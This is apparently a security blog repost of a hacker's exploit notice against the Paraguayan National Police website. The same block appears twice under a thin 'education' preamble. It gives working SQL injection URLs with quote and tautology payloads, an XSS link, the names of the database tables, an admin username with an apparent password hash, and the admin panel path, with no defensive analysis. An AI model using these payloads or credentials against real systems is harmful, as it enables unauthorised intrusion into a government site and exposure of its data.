As always this information is for education purposes. We show these compromised systems so that you understand the current threat environment that surrounds us everyday and how significant it is to take the appropriate countermeasures to safeguard your critical data no matter what size your organization is as well as your individual data driven devices. Below is POC of the exploit/compromise. Again as always be proactive not reactive in safeguarding your critical data and stay safe out there. Subsequently as you are aware this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures such as those described in ISO13335 to prevent yourselves from becoming victims in the current threat environment,
The exploit is provided below as I will continue to monitor the net to safeguard systems and individuals critical data. Additionally this information is provided to our readers as an addendum to the California Database Security Breach Act.
######################Exploit#######################
# Exploit Title: SQL/XSS POLICIA NACIONAL PARAGUAY
#
# Exploit Author: YeiZeta
#
# Category: Web Application
#
##############################################
TABLETAS:
admin,agrupaciones,albumes,habilidades,imagenes,institucional,museoFotos,museoGalery,novedades,revistas,tramites,videos
Current DB: policiaNacional
XSS:
http://bit.ly/UZYN7E
SQL:
http://www.policianacional.gov.py/galeria_visor.php?id=1´
http://www.policianacional.gov.py/g_tramites.php?tipo=%27+OR+%27ns%27%3d%27ns&titulo=TRAMITES
Admin Login:
USUARIO:policia
contraseña:d173cab476c3c881fdc89b0dcfc18e95
http://www.policianacional.gov.py/admin/view/cms/
##############################################
https://www.facebook.com/TheJokerHack
##############################################
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
The exploit is provided below as I will continue to monitor the net to safeguard systems and individuals critical data. Additionally this information is provided to our readers as an addendum to the California Database Security Breach Act.
######################Exploit#######################
# Exploit Title: SQL/XSS POLICIA NACIONAL PARAGUAY
#
# Exploit Author: YeiZeta
#
# Category: Web Application
#
##############################################
TABLETAS:
admin,agrupaciones,albumes,habilidades,imagenes,institucional,museoFotos,museoGalery,novedades,revistas,tramites,videos
Current DB: policiaNacional
XSS:
http://bit.ly/UZYN7E
SQL:
http://www.policianacional.gov.py/galeria_visor.php?id=1´
http://www.policianacional.gov.py/g_tramites.php?tipo=%27+OR+%27ns%27%3d%27ns&titulo=TRAMITES
Admin Login:
USUARIO:policia
contraseña:d173cab476c3c881fdc89b0dcfc18e95
http://www.policianacional.gov.py/admin/view/cms/
##############################################
https://www.facebook.com/TheJokerHack
##############################################
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information